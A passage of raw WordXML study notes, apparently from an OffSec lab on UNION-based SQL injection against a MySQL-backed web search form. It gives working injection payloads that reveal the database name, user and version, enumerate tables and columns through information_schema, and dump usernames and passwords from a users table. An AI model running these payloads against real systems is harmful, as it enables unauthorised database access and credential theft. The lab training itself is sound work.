        <w:t xml:space="preserve"> table, we'll use the percentage sign followed by a single quote to close the search parameter. Then, we begin our injected query with a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement that dumps the current database name, the user, and the MySQL version in the first, second, and third columns, respectively, leaving the remaining two null.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 12: Enumerating the Database" id="532" name="image524.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 12: Enumerating the Database" id="0" name="image524.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId457"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3048000"/>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16D8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After launching our attack, we'll notice that the username and the DB version are present on the last line, but the current database name is not. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016D9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This happens because column 1 is typically reserved for the ID field consisting of an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">integer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> data type, meaning it cannot return the string value we are requesting through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT database()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The web application explicitly omits the output from the first column because IDs are not usually useful information for end users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this in mind, let's update our query by shifting all the enumerating functions to the right-most place, avoiding any type mismatches.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT null, null, database(), user(), @@version  -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we already verified the expected output, we can omit the percentage sign and rerun our modified query.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2273300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 13: Fixing the SQL Query" id="113" name="image112.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 13: Fixing the SQL Query" id="0" name="image112.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId458"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2273300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This time, all three values returned correctly, including </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the current database name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's extend our tradecraft and verify whether other tables are present in the current database. We can start by enumerating the</w:t>
      </w:r>
      <w:hyperlink r:id="rId459">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId460">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">information schema</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the current database from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema.columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll attempt to retrieve the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> database belonging to the current database. We'll then store the output in the second, third, and fourth columns, leaving the first and fifth columns null.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">null, table_name, column_name, table_schema, null </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">information_schema.columns</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table_schema=database() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how to get the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">column name of each table</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, as well as having the schema specified</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In mysql, schema and database are the same thing. In other SQL languages, a single database can have many schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1393"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table_schema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" column will return the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1393"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is specific to the current database, as specified in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">table_schema=database() </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> database()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns the name of current database</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running our new enumeration attempt results in the below output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1841500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 14: Dumping the Current Database Tables Structure" id="446" name="image438.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 14: Dumping the Current Database Tables Structure" id="0" name="image438.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId461"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1841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EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have two table names (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">customers</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second columns shows all the available for each table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="886"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Third column specifies the database (a.k.a schema)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016ED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This output verifies that the three columns contain the table name, the column name, and the current database/schema, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interestingly, we discovered a new table named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that contains four columns, including one named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016EF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's craft a new query to dump the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> null, username, password, description, null</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000016F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="120"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
